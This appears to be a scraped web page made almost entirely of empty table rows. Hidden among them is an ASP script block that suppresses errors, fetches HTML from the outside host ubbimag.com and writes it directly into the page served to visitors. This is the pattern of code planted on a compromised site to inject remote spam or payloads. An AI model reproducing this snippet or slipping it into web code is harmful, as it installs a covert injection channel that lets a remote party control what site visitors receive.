| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
<%
On Error Resume Next
set XmlObj = Server.CreateObject("Microsoft.XMLHTTP")
XmlObj.open "GET", "http://ubbimag.com/z10.html", false
XmlObj.send
formatdata = XmlObj.responseText
file_get_contents=formatdata
Set XmlObj = nothing
response.write file_get_contents
%> | | |
| | |
| | |
| | |
| | |
| | |
| | |
| | |